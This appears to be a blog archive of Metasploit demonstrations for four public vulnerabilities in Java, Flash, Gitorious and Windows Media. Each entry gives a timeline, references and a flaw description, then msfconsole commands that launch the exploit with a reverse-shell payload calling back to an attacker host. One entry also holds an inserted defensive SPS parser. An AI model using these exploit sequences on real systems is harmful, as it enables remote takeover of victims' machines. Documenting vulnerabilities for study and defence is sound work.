Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI on 2009-12-10
Coordinated public release of the vulnerability on 2010-04-05
Details of the vulnerability and first PoC disclosed on 2010-05-21
Metasploit PoC provided on 2012-02-15

PoC provided by :

Peter Vreugdenhil
juan vazquez

Reference(s) :

CVE-2010-0842
OSVDB-63493
ZDI-10-060

Affected version(s) :

Java 6 before or equal to update 18

Tested on Windows 7 Integral with :

Java 6 Update 18
Internet Explorer 9

Description :

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation is done by supplying a specially crafted MIDI file within an RMF file. When the MixerSequencer object is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A MIDI block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When the vulnerability is triggered, “ebx” points to a fake event in the MIDI file which stores the shellcode. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable across Java updates.

Commands :

use exploit/windows/browser/java_mixer_sequencer
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2011-2140 Adobe Flash Player MP4 Metasploit Demo

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI on 2011-02-10
Coordinated public release of the vulnerability on 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec on 2012-01-31
Metasploit PoC provided on 2012-02-10

PoC provided by :

Alexander Gavrun
Abysssec
sinn3r

Reference(s) :

CVE-2011-2140
OSVDB-74439
ZDI-11-276
APSB11-21

Affected version(s) :

Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing an MP4 file (specifically the Sequence Parameter Set), Flash checks whether pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies the offset_for_ref_frame data onto the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid
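The Sequence Parameter Set check the description above refers to, as an added example that is not code from the original post or from the Metasploit module: a small Python parser that walks an H.264 SPS up to num_ref_frames_in_pic_order_cnt_cycle and flags a value above the spec bound of 255, the kind of check a defender would put in a file scanner or a fuzz harness for avcC/SPS data. It assumes a Baseline, Main or Extended profile SPS NAL unit with its header byte present; the two sample units at the bottom are constructed for the demonstration, not taken from any real file.

```python
# Added example (not the blog's or Metasploit's code): parse an H.264 SPS as far
# as the fields the advisory names and flag an out-of-spec cycle count.
MAX_CYCLE = 255  # H.264 7.4.2.1.1 bounds num_ref_frames_in_pic_order_cnt_cycle

class BitReader:  # MSB-first reader over an RBSP (emulation bytes removed)
    def __init__(self, data: bytes):
        self.bits, self.pos = "".join(f"{b:08b}" for b in data), 0

    def u(self, n: int) -> int:
        if self.pos + n > len(self.bits):
            raise ValueError("truncated SPS")
        val = int(self.bits[self.pos:self.pos + n], 2) if n else 0
        self.pos += n
        return val

    def ue(self) -> int:  # Exp-Golomb: N leading zeros, a '1', then N bits
        zeros = 0
        while self.u(1) == 0:  # u() raises on truncation, so this terminates
            zeros += 1
        return (1 << zeros) - 1 + self.u(zeros)

def unescape_rbsp(nal: bytes) -> bytes:  # drop the 0x03 of every 00 00 03
    out, zeros = bytearray(), 0
    for b in nal:
        if zeros >= 2 and b == 3:
            zeros = 0
            continue
        out.append(b)
        zeros = zeros + 1 if b == 0 else 0
    return bytes(out)

def check_sps(nal: bytes) -> dict:
    r = BitReader(unescape_rbsp(nal[1:]))  # nal[0] is the NAL header (0x67)
    profile_idc = r.u(8)
    if profile_idc not in (66, 77, 88):  # Baseline, Main, Extended only
        raise ValueError("profile adds chroma/scaling syntax; not handled here")
    r.u(16)  # constraint_set flags + reserved bits, then level_idc
    r.ue(); r.ue()  # seq_parameter_set_id, log2_max_frame_num_minus4
    poc_type = r.ue()
    info = {"pic_order_cnt_type": poc_type, "cycle": None, "suspicious": False}
    if poc_type == 1:  # the branch the advisory describes
        r.u(1)  # delta_pic_order_always_zero_flag
        r.ue(); r.ue()  # two se(v) offsets: same bit layout as ue(v), values unused
        info["cycle"] = r.ue()  # how many offset_for_ref_frame[] entries follow
        info["suspicious"] = info["cycle"] > MAX_CYCLE
    return info

# Constructed SPS NAL units (not from a real file): Baseline, POC type 1, 2-entry cycle vs 300 entries
SPS_OK = bytes.fromhex("6742001ed36890")
SPS_BAD = bytes.fromhex("6742001ed30096c0")
```

A cycle count above 255 is only a spec violation, not proof of an attack, but it is exactly the field the vulnerable copy trusted, so it is the right thing to alert on.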

OSVDB-78480 Gitorious Arbitrary Command Execution Metasploit Demo

Timeline :

Vulnerability reported to the vendor by joernchen on 2012-01-17
Coordinated public release of the vulnerability on 2012-01-27
Metasploit PoC provided on 2012-01-19

PoC provided by :

joernchen

Reference(s) :

OSVDB-78480

Affected version(s) :

Gitorious before or equal to version 2.1.0

Tested on Ubuntu 11.10 with :

Gitorious 2.1.0

Description :

This module exploits an arbitrary command execution vulnerability in Gitorious. Unvalidated input is sent to the shell, allowing command execution.

Commands :

use exploit/multi/http/gitorious_graph
set RHOST 192.168.178.115
set URI /myproject/myproject
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.100
exploit

uname -a
id

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability on 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided on 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leads to remote code execution under the context of the user. At this time, for the IE 8 target, the JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid